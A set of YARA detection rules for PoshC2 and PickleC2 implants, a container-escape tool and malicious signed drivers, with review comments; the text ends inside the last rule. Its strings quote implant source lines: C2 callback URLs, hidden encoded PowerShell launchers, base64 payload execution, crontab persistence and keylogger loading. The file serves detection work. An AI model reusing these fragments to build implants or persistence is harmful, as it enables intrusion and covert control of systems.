import "hash"
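rule PickleC2 {
    // PickleC2 PowerShell implant (powershell.ps1). Auto-generated string set;
    // matches either the exact sample hash or a heuristic string/size combination.
    meta:
        description = "PickleC2 - powershell.ps1"
        sha256 = "3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1"
    strings:
        $s1 = "function Execute($key,$ip,$port,$implant_name,$sleep_time){" ascii fullword
        $s2 = "Execute $key $ip $port $implant_name $sleep_time" ascii fullword
        // $s3 is a truncated source line, hence no modifiers. The original rule
        // carried an identical copy as $s8; it was dropped so the same content
        // counts once toward "8 of them" instead of twice.
        $s3 = " $LocalIPs = \"LocalIPs(\" + (([System.Net.Dns]::GetHostByName($NULL).AddressList | Select IPAddressToString | findstr \".*.*"
        $s4 = " $process.startInfo.UseShellExecute = $false" ascii fullword
        $s5 = " $Hostname = \"Machine_Name(\"+ [System.Net.Dns]::GetHostByName($NULL).Hostname + \")\"" ascii fullword
        $s6 = " $data = (Invoke-WebRequest -UseBasicParsing -Uri $file_download -Method 'POST').Content" ascii fullword
        // AES-CBC decrypt with a 16-byte IV prefix; shared with PoshC2 PowerShell payloads.
        $s7 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);" ascii fullword
        $s9 = " $process.StandardOutput.ReadToEnd() + $process.StandardError.ReadToEnd() " ascii fullword
        $s10 = " $cmd = \"cmd.exe\"" ascii fullword
        // Split-string URL building ("ht" + 'tp:' ...) used to evade naive URL scanning.
        $s11 = " $file_download = \"ht\" + 'tp:' + \"//\" + $ip + \":$port/task/$implant_name/file.ret\"" ascii fullword
        $s12 = " elseif ($binary -eq \"execute\"){" ascii fullword
        $s13 = " -join ',').replace('IPAddressToString,-----------------,','').replace(\" \",\"\") + \")\"" ascii fullword
        $s14 = " $cmd = \"powershell.exe\"" ascii fullword
        $s15 = "function Decrypt-String($key, $encryptedStringWithIV) {" ascii fullword
        $s16 = " $task_req = (Invoke-WebRequest -UseBasicParsing -Uri $task -Method 'GET').Content" ascii fullword
        $s17 = " $task = \"ht\" + \"tp:\" + \"//\" + $ip + \":$port/task/$implant_name\"" ascii fullword
        $s18 = " $result = \"ht\" + \"tp:\" + \"//\" + $ip + \":$port/result/$implant_name\"" ascii fullword
        $s19 = " $process.startInfo.RedirectStandardError = $true" ascii fullword
        $s20 = " $results = Encrypt-String $key \"Downloaded\"" ascii fullword
    condition:
        // Cheap checks first. 0x7566 is the little-endian uint16 of "fu", i.e. a
        // script whose first token is "function". The full-file SHA-256 is only
        // computed when the heuristic branch fails, instead of for every file scanned.
        (uint16(0) == 0x7566 and filesize < 20KB and 8 of them)
        or hash.sha256(0, filesize) == "3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1"
}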
import "hash"
import "pe"
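rule PoshC2_Csc {
    // PoshC2 csc.exe module (Roslyn-compiled .NET loader). The "pe" import on
    // this file is not used by the condition; only "hash" is needed here.
    meta:
        description = "PoshC2 - csc.exe"
        sha256 = "df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa"
    strings:
        $s1 = "csc.exe" ascii fullword
        // $s2, $s3, $s6, $s7, $s15 are the default Roslyn application manifest and
        // $s4, $s12, $s16, $s20 are compiler-emitted attributes: all present in most
        // small .NET builds, so they contribute little specificity on their own.
        $s2 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s3 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
        $s4 = "Microsoft.CodeAnalysis" ascii fullword
        // P/Invoke parameter names of CreateThread / VirtualProtect, i.e. in-memory execution.
        $s5 = "lpThreadId" ascii fullword
        $s6 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
        $s7 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
        $s8 = "lpAddress" ascii fullword
        $s9 = "Protection" ascii fullword
        $s10 = "Program" ascii fullword
        $s11 = "lpStartAddress" ascii fullword
        $s12 = "RefSafetyRulesAttribute" ascii fullword
        $s13 = "flNewProtect" ascii fullword
        $s14 = "lpflOldProtect" ascii fullword
        $s15 = " </trustInfo>" ascii fullword
        $s16 = "EmbeddedAttribute" ascii fullword
        $s17 = "dwStackSize" ascii fullword
        // Template placeholders the PoshC2 server substitutes at payload build time.
        $s18 = "#REPLACEME64#" wide fullword
        $s19 = "#REPLACEME32#" wide fullword
        $s20 = "System.Runtime.CompilerServices" ascii fullword
        $s21 = "FromBase64String" ascii fullword
    condition:
        // "MZ" header, size cap and string count first; the full-file SHA-256
        // is only evaluated when the heuristic branch fails.
        (uint16(0) == 0x5a4d and filesize < 20KB and 8 of them)
        or hash.sha256(0, filesize) == "df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa"
}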
import "hash"
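rule PoshC2_DynamicCode {
    // PoshC2 DynamicCode.exe module.
    // NOTE(review): 13 of the 16 strings are stock Roslyn manifest/attribute text
    // or bare identifiers ("Program", "Console", "System"), so "8 of them" can be
    // satisfied by unrelated small .NET console binaries. $s1, $s2 and $s13 are
    // the tool-specific ones; consider requiring one of them if FPs are observed.
    meta:
        description = "PoshC2 - DynamicCode.exe"
        sha256 = "8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f"
    strings:
        $s1 = "DynamicCode.exe" ascii fullword
        $s2 = "Dynamic Code executed successfully" wide fullword
        $s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s4 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
        $s5 = "Microsoft.CodeAnalysis" ascii fullword
        $s6 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
        $s7 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
        $s8 = "Program" ascii fullword
        $s9 = "Console" ascii fullword
        $s10 = "RefSafetyRulesAttribute" ascii fullword
        $s11 = " </trustInfo>" ascii fullword
        $s12 = "EmbeddedAttribute" ascii fullword
        $s13 = "PoshC2DynamicCode" ascii fullword
        $s14 = "System.Runtime.CompilerServices" ascii fullword
        $s15 = "System" ascii fullword
        $s16 = " </requestedPrivileges>" ascii fullword
    condition:
        // "MZ" header, size cap and string count first; SHA-256 only as fallback.
        (uint16(0) == 0x5a4d and filesize < 10KB and 8 of them)
        or hash.sha256(0, filesize) == "8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f"
}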
import "hash"
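rule PoshC2_Fcomm {
    // PoshC2 fcomm.exe (file-based comms implant). Strings mix implant
    // command verbs (wide) with .NET method/identifier names (ascii).
    meta:
        description = "PoshC2 - fcomm.exe"
        sha256 = "f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c"
    strings:
        $s1 = "fcomm.exe" ascii fullword
        $s2 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s3 = "ParseCommandLineArgs" ascii fullword
        // Implant tasking verbs shared across PoshC2 C# implants (see also PoshC2_Pbind).
        $s4 = "run-dll-background" wide fullword
        $s5 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
        $s6 = "HostInfo" ascii fullword
        $s7 = "GetCurrentTasking" ascii fullword
        $s8 = "objContents" ascii fullword
        $s9 = "get_Actioned" ascii fullword
        $s10 = "CreateEncryptionAlgorithm" ascii fullword
        $s11 = "run-dll" wide fullword
        $s12 = "run-exe Core.Program Core " wide fullword
        $s13 = "initialised" ascii fullword
        $s14 = "loadmodule" wide fullword
        $s15 = "[!] This is not implemented yet in FComm implant types." wide fullword
        $s16 = "Microsoft.CodeAnalysis" ascii fullword
        $s17 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
        $s18 = "SafeFileRead" ascii fullword
        $s19 = "FCommConnect" ascii fullword
        $s20 = "GzipCompress" ascii fullword
    condition:
        // "MZ" header, size cap and string count first; SHA-256 only as fallback.
        (uint16(0) == 0x5a4d and filesize < 40KB and 8 of them)
        or hash.sha256(0, filesize) == "f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c"
}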
rule pentest_tool_botb {
    // Break Out The Box (botb) container-escape/enumeration tool, keyed on its
    // Go import path, the author's build path and two banner strings.
    // Every string is required, so the rule is tight but brittle to rebuilds.
    meta:
        description = "Detects Break Out The Box"
        // NOTE(review): the author value looks like an e-mail-protection
        // placeholder left by the page this rule was copied from; verify upstream.
        author = " [email protected] "
        date = "2021-06-28"
        license = "Apache License 2.0"
        hash1 = "3aae4a2bf41aedaa3b12a2a97398fa89a9818b4bec433c20b4e724505277af83"
    strings:
        $path1 = "github.com/brompwnie/botb" ascii wide
        $path2 = "/Users/cleroy/go/src" ascii wide
        $msg1 = "Data uploaded to" ascii wide
        $msg2 = "Break Out The Box" ascii wide
    condition:
        all of them
}
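rule M_Hunting_Win_ConventionEngine_PDB_Attestation_Multiple_1 {
    // Hunts PE files whose CodeView debug record carries one of several PDB
    // paths observed in attestation-signed malicious drivers. Each regex is
    // "RSDS" + 20 bytes (16-byte GUID + 4-byte age) + a drive-letter path
    // ending in ".pdb" and a NUL terminator.
    meta:
        author = "Mandiant"
        date_created = "2022-10-20"
        description = "Looking for PDB path strings that has been observed in malicious samples which were attestation signed"
    strings:
        $anchor = "RSDS"
        $pdb1 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}gamehacks.{0,250}boot_driver.{0,250}\.pdb\x00/ nocase
        $pdb2 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}MyDriver1.{0,250}wfp_vpn.{0,250}\.pdb\x00/ nocase
        $pdb3 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}FilDriverx64_win10.{0,250}\.pdb\x00/ nocase
        $pdb4 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}RedDriver_win10.{0,250}\.pdb\x00/ nocase
        $pdb5 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}sellcode.{0,250}MyDriver.{0,250}\.pdb\x00/ nocase
        // Fixed: the original read "ljl11{0,250}", which applies the quantifier to
        // the literal "1" and therefore only matched a PDB sitting directly in the
        // user directory ("Users\ljl1...1.pdb"). The "." restores the arbitrary
        // path tail that every sibling pattern allows.
        $pdb6 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}Users\\ljl11.{0,250}\.pdb\x00/ nocase
        $pdb7 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}RkDriver64.{0,250}MyDriver1.{0,250}\.pdb\x00/ nocase
        $pdb8 = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\.{0,250}\\ApcHelper.{0,250}TSComputerManager.{0,250}\.pdb\x00/ nocase
    condition:
        // "MZ" DOS header and "PE\0\0" signature at e_lfanew (offset 0x3C).
        uint16(0) == 0x5A4D
        and uint32(uint32(0x3C)) == 0x00004550
        and filesize < 20MB
        and $anchor
        and 1 of ($pdb*)
}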
import "hash"
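rule PoshC2_Pbind {
    // PoshC2 pbind.exe (named-pipe bind implant). Operator-facing status
    // messages and tasking verbs are wide; .NET identifiers are ascii.
    meta:
        description = "PoshC2 - pbind.exe"
        sha256 = "fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383"
    strings:
        $s1 = "pbind.exe" ascii fullword
        $s2 = "[+] Running task in background, run get-bg to get background output." wide fullword
        $s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s4 = "ParseCommandLineArgs" ascii fullword
        $s5 = "run-dll-background" wide fullword
        $s6 = "[*] Only run one task in the background at a time per implant." wide fullword
        $s7 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
        // Build-time placeholders; their presence indicates an unpopulated template,
        // a populated payload will carry the real pipe name / key instead.
        $s8 = "#REPLACEPBINDPIPENAME#" wide fullword
        $s9 = "CreateEncryptionAlgorithm" ascii fullword
        $s10 = "run-dll" wide fullword
        $s11 = "run-exe Core.Program Core " wide fullword
        $s12 = "$[-] Cannot read from pipe" wide fullword
        $s13 = "loadmodule" wide fullword
        $s14 = "[-] No output" wide fullword
        $s15 = "Microsoft.CodeAnalysis" ascii fullword
        $s16 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
        $s17 = "GzipCompress" ascii fullword
        $s18 = "#REPLACEKEY#" wide fullword
        $s19 = "Error loading modules {0}" wide fullword
        $s20 = "run-exe-background" wide fullword
        $s21 = "Invoke" wide fullword
    condition:
        // "MZ" header, size cap and string count first; SHA-256 only as fallback.
        (uint16(0) == 0x5a4d and filesize < 40KB and 8 of them)
        or hash.sha256(0, filesize) == "fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383"
}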
import "hash"
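rule PoshC2_Sharp_Powershell_Runner {
    // PoshC2 Sharp_Powershell_Runner.exe: hosts a PowerShell runspace from C#
    // (System.Management.Automation identifiers plus an IEX snippet).
    meta:
        description = "PoshC2 Sharp_Powershell_Runner.exe"
        sha256 = "a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259"
    strings:
        $s1 = "Sharp_Powershell_Runner.exe" ascii fullword
        $s2 = "basepayload" ascii fullword
        $s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s4 = "get_SessionStateProxy" ascii fullword
        $s5 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
        $s6 = "get_PSVariable" ascii fullword
        $s7 = "Sharp_Powershell_Runner" ascii fullword
        $s8 = "InvokeAutomation" ascii fullword
        $s9 = "Microsoft.CodeAnalysis" ascii fullword
        $s10 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
        $s11 = "DllBaseAddress" ascii fullword
        $s12 = "RunspaceInvoke" ascii fullword
        $s13 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
        // Embedded PowerShell: executes an attacker-supplied string and captures output.
        $s14 = "$o = IEX $c | Out-String" wide fullword
        $s15 = "Program" ascii fullword
        $s16 = "Encoding" ascii fullword
        $s17 = "RefSafetyRulesAttribute" ascii fullword
        $s18 = " </trustInfo>" ascii fullword
        $s19 = "EmbeddedAttribute" ascii fullword
        $s20 = "baseAddr" ascii fullword
    condition:
        // "MZ" header, size cap and string count first; SHA-256 only as fallback.
        (uint16(0) == 0x5a4d and filesize < 20KB and 8 of them)
        or hash.sha256(0, filesize) == "a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259"
}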
import "pe"
import "hash"
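rule PoshC2_Dropper {
    // PoshC2 native dropper.exe. Most strings are MSVC CRT/RTTI boilerplate, so
    // the real specificity comes from the import set (WriteProcessMemory +
    // CreateRemoteThread + OpenProcess, i.e. remote injection) and the section name.
    meta:
        description = "PoshC2 - dropper.exe"
        sha256 = "9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4"
    strings:
        $s1 = "AppPolicyGetProcessTerminationMethod" ascii fullword
        $s2 = " Type Descriptor'" ascii fullword
        $s3 = "operator co_await" ascii fullword
        $s4 = "operator<=>" ascii fullword
        $s5 = ".data$rs" ascii fullword
        $s6 = "api-ms-win-appmodel-runtime-l1-1-2" wide fullword
        $s7 = " Class Hierarchy Descriptor'" ascii fullword
        $s8 = " Base Class Descriptor at (" ascii fullword
        $s9 = " Complete Object Locator'" ascii fullword
        $s10 = "__swift_3" ascii fullword
        $s11 = "__swift_2" ascii fullword
        $s12 = ".rdata$voltmd" ascii fullword
        // $s13, $s16, $s17 are opaque byte fragments from the sample; they pin
        // this build rather than the family.
        $s13 = "xWI96tRI" ascii fullword
        $s14 = " delete[]" ascii fullword
        $s15 = "__swift_1" ascii fullword
        $s16 = "vKfffff" ascii fullword
        $s17 = "D$0@8{" ascii fullword
        $s18 = "api-ms-win-core-file-l1-2-4" wide fullword
        $s19 = "api-ms-win-core-file-l1-2-2" wide fullword
        $s20 = " delete" ascii fullword
    condition:
        // Cheap header/size/string checks first, then pe-module lookups, then the
        // full-file SHA-256 as a last resort. pe.sections[4] is undefined for PEs
        // with fewer than five sections, which makes this branch false for them.
        (
            uint16(0) == 0x5a4d
            and filesize < 300KB
            and 8 of them
            and pe.sections[4].name == "_RDATA"
            and pe.imports("kernel32.dll", "WriteProcessMemory")
            and pe.imports("kernel32.dll", "CreateRemoteThread")
            and pe.imports("kernel32.dll", "OpenProcess")
            and pe.imports("kernel32.dll", "TerminateProcess")
        )
        or hash.sha256(0, filesize) == "9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4"
}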
import "hash"
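rule PoshC2_DotNet2JS {
    // PoshC2 DotNet2JS.js (JScript loader carrying a base64 .NET assembly).
    // NOTE(review): $s1-$s17 are runs of "A" from base64-encoded zero padding.
    // Shorter runs are substrings of longer ones, so a single long run satisfies
    // several of them at once, and such low-entropy strings are slow to scan
    // and common in any base64 blob. $s18-$s20 carry the actual specificity.
    meta:
        description = "PoshC2 - DotNet2JS.js"
        sha256 = "1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53"
    strings:
        $s1 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $s2 = "AAAAAAAAAAAAAAAAAAAAAAAAA"
        $s3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $s4 = "AAAAAAAAAAAAAEAAAE"
        $s5 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $s6 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAB"
        $s7 = "AAAAAAAAAAAAAAAAAAAAAAAAB"
        $s8 = "AAAAAAAAAAD"
        $s9 = "AAAAAAAAAEA"
        $s10 = "AAAAAAAAAAAAAAAAAAAAAAAAAAABD"
        $s11 = "AADAAAABAAAA"
        $s12 = "AAAAAAAAAAAAAAAAAAAAAcC0AAAAAAAB"
        $s13 = "ADAAAAA4AA"
        $s14 = "AAAAAAAAAAAAAE4A"
        $s15 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA"
        $s16 = "AABAACAAAEAA"
        $s17 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA"
        $s18 = "function dbg(s) {WScript.Echo(s);}" ascii fullword
        $s19 = "var ba = enc.GetBytes_4(b);" ascii fullword
        $s20 = "var length = enc.GetByteCount_2(b);" ascii fullword
    condition:
        // 0x6176 is the little-endian uint16 of "va" (script beginning with "var").
        // Heuristics first; SHA-256 only when they fail.
        (uint16(0) == 0x6176 and filesize < 30KB and 8 of them)
        or hash.sha256(0, filesize) == "1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53"
}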
import "hash"
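rule PoshC2_DropperPy {
    // PoshC2 Python dropper.py (urllib2-based stager with an encrypted
    // "SessionID" cookie and a kill date). Strings are whole source lines.
    meta:
        description = "PoshC2 - dropper.py"
        sha256 = "33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7"
    strings:
        $s1 = "if hh[0]: headers = ({'Host':hh[0],'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode(\"utf-8\")})" ascii fullword
        $s2 = "if hh[0]:r=urllib2.Request(url2,headers={'Host':hh[0],'User-agent':ua,'Cookie':'SessionID=%s' % encsid})" ascii fullword
        $s3 = "if hh[0]: r=urllib2.Request(url,headers={'Host':hh[0],'User-agent':ua})" ascii fullword
        $s4 = "else: headers = ({'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode(\"utf-8\")})" ascii fullword
        $s5 = "else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%s' % encsid})" ascii fullword
        // Host-profile beacon encrypted into the session cookie ($s6/$s7 differ only in procname vs pname).
        $s6 = "encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,procname,urlid))" ascii fullword
        $s7 = "encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,pname,urlid))" ascii fullword
        $s8 = "else: r=urllib2.Request(url,headers={'User-agent':ua})" ascii fullword
        $s9 = "hn=socket.gethostname();o=urllib2.build_opener()" ascii fullword
        // Second-stage execution of a base64 blob.
        $s10 = "exec(base64.b64decode(x))" ascii fullword
        $s11 = "html = response.read().decode('utf-8');x=decrypt(key, html)" ascii fullword
        // #REPLACE...# placeholders are substituted by the PoshC2 server at build time.
        $s12 = "ua=\"#REPLACEUSERAGENT#\"" ascii fullword
        $s13 = "url=serverclean[0]+\"#REPLACEQUICKCOMMAND#\"" ascii fullword
        $s14 = "res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\\0');" ascii fullword
        $s15 = "serverclean=[#REPLACEHOSTPORT#]" ascii fullword
        $s16 = "pykey=\"#REPLACESPYTHONKEY#\"" ascii fullword
        $s17 = "if pykey in b and pyhash == s and cstr < kdn: " ascii fullword
        $s18 = "import os,sys,base64,ssl,socket,pwd,hashlib,time" ascii fullword
        $s19 = "kdn=time.strptime(\"#REPLACEKILLDATE#\",\"%Y-%m-%d\")" ascii fullword
        $s20 = "cstr=time.strftime(\"%Y-%m-%d\",time.gmtime());cstr=time.strptime(cstr,\"%Y-%m-%d\")" ascii fullword
    condition:
        // 0x6d69 is the little-endian uint16 of "im" (script beginning with "import").
        // Heuristics first; SHA-256 only when they fail.
        (uint16(0) == 0x6d69 and filesize < 6KB and 8 of them)
        or hash.sha256(0, filesize) == "33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7"
}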
import "hash"
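rule PoshC2_ImplantCorePy {
    // PoshC2 Implant-Core.py. $x1 is the high-confidence anchor (Empire
    // keylogger provenance comment); $s* are generic implant source lines.
    // Two exact duplicates from the original rule ($x2 == $x1, $s15 == $s8)
    // were removed so the same content no longer counts twice toward "4 of them".
    meta:
        description = "PoshC2 - Implant-Core.py"
        sha256 = "8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88"
    strings:
        $x1 = " # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/"
        // Persistence via crontab entry pointing at the dropped _psh.sh script.
        $s3 = " s.call(\"crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -\" %% filename, shell=True)" ascii fullword
        $s4 = " modpayload = modb64logger.replace(\"REPLACEME\",filename)" ascii fullword
        $s5 = " returnval = \"%%s \\\\r\\\\nKeylogger started here: %%s\" %% (pids, filename)" ascii fullword
        $s6 = " filename = \"%%s/%%s_psh.sh\" %% (dircontent, uuid.uuid4().hex)" ascii fullword
        $s7 = " dircontent = \"%%s/.%%s\" %% (os.environ['HOME'], uuid.uuid4().hex)" ascii fullword
        $s8 = " if hh[0]: req=urllib2.Request(server,dataimagebytes,headers={'Host':str(hh[0]),'User-agent':str(ua),'Cookie':\"Sessi"
        $s9 = " returnval = \"Ran Start Another Implant - File dropped: %%s\" %% filename" ascii fullword
        $s10 = " returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)" ascii fullword
        $s11 = " aes = get_encryption(key, iv)" ascii fullword
        $s12 = " if hh[0]: req=urllib2.Request(server,headers={'Host':str(hh[0]),'User-agent':str(ua)})" ascii fullword
        $s13 = " import subprocess as s" ascii fullword
        $s14 = "modules/python/collection/osx/keylogger.py" ascii fullword
        $s16 = " postcookie = encrypt(key, taskId).decode(\"utf-8\")" ascii fullword
        $s17 = " import subprocess" ascii fullword
        $s18 = " exec(modpayload)" ascii fullword
        $s19 = " s.call(\"crontab -l | { cat; } | grep -v '_psh.sh'| crontab -\", shell=True)" ascii fullword
        $s20 = " modb64logger = base64.b64decode(b64logger)" ascii fullword
    condition:
        // 0x6d69 is the little-endian uint16 of "im" ("import"). Heuristics
        // first; the full-file SHA-256 only when they fail.
        (uint16(0) == 0x6d69 and filesize < 40KB and 1 of ($x*) and 4 of them)
        or hash.sha256(0, filesize) == "8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88"
}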
import "hash"
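rule PoshC2_ImplantCorePs1 {
    // PoshC2 Implant-Core.ps1. $x1 (the encoded-command launcher line) is the
    // anchor. Exact duplicates from the original rule ($s10 == $s3, $s12 == $s11,
    // $s16 == $s14, $s17 == $s15) were removed so each line counts once toward
    // "4 of them". $s6 and $s7 still differ only by a trailing ";" and will
    // normally match together, effectively counting as two.
    meta:
        description = "PoshC2 - Implant-Core.ps1"
        sha256 = "6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2"
    strings:
        $x1 = "$payloadraw = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)\"" ascii fullword
        $s2 = "$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))" ascii fullword
        // Truncated line ("sal a New-Object;iex(...DeflateStream...)" stager), hence no modifiers.
        $s3 = "$NewScript = \"sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64Stri"
        $s4 = "$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear)" ascii fullword
        $s5 = "g(`\"$EncodedCompressedScript`\"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()\"" ascii fullword
        $s6 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)" ascii fullword
        $s7 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);" ascii fullword
        $s8 = "$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)" ascii fullword
        $s9 = "$payload = $payloadraw -replace \"`n\", \"\"" ascii fullword
        $s11 = " [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($unencrypte"
        $s13 = " $splitcmd = $ReadCommandClear -replace \"multicmd\",\"\"" ascii fullword
        $s14 = " $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencrypte"
        $s15 = " if ($ReadCommandClear -match (\"(.+)Base64\")) { $result = $Matches[0] } # $result doesn't app"
        $s18 = "function Decrypt-String($key, $encryptedStringWithIV) {" ascii fullword
        $s19 = "dData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()" ascii fullword
        $s20 = " if (($ReadCommandClear) -and ($ReadCommandClear -ne \"fvdsghfdsyyh\")) {" ascii fullword
    condition:
        // 0x6b24 is the little-endian uint16 of "$k" (script beginning with a
        // "$k..." variable). Heuristics first; SHA-256 only when they fail.
        (uint16(0) == 0x6b24 and filesize < 40KB and 1 of ($x*) and 4 of them)
        or hash.sha256(0, filesize) == "6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2"
}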
import "hash"
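rule PoshC2_PbindPs1 {
    // PoshC2 pbind.ps1: PowerShell named-pipe bind implant. Exact duplicates
    // from the original rule ($s2 == $s1, $s13 == $s10) were removed so each
    // line counts once toward "8 of them".
    meta:
        description = "PoshC2 - pbind.ps1"
        sha256 = "696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7"
    strings:
        $s1 = " $decCommand = Decrypt-String -key $key -encryptedStringWithIV $command" ascii fullword
        $s3 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)" ascii fullword
        $s4 = " $encCommand2 = Encrypt-String -unencryptedString $res -Key $key" ascii fullword
        $s5 = " $encCommand = Encrypt-String -unencryptedString 'COMMAND' -Key $key" ascii fullword
        $s6 = " $encbad = Encrypt-String -unencryptedString 'This should never fire! - crypto failure' -Key $key" ascii fullword
        $s7 = "$Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($pname,'InOut',100, 'Byte', 'None', 4096, 4096, $PipeSecurity)" ascii fullword
        $s8 = " if ($decCommand -eq 'KILLPIPE'){exit}" ascii fullword
        // Unpopulated template invocation; a built payload carries the real values.
        $s9 = "invoke-pserv -secret #REPLACEPBINDSECRET# -key #REPLACEKEY# -pname #REPLACEPBINDPIPENAME#" ascii fullword
        $s10 = " $command = $pipeReader.ReadLine()" ascii fullword
        $s11 = "$PipeSecurity = New-Object System.IO.Pipes.PipeSecurity" ascii fullword
        // Pipe ACL granting Everyone ReadWrite: useful on its own as a hunting indicator.
        $s12 = "$AccessRule = New-Object System.IO.Pipes.PipeAccessRule( 'Everyone', 'ReadWrite', 'Allow' )" ascii fullword
        $s14 = " $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)" ascii fullword
        $s15 = " $fileContentBytes = [System.Text.Encoding]::Unicode.GetBytes($res)" ascii fullword
        $s16 = " [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)" ascii fullword
        $s17 = " {$aesManaged.Key = [System.Convert]::FromBase64String($key)}" ascii fullword
        $s18 = " $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)" ascii fullword
        $s19 = " if ($decCommand -eq 'EXIT') { break }" ascii fullword
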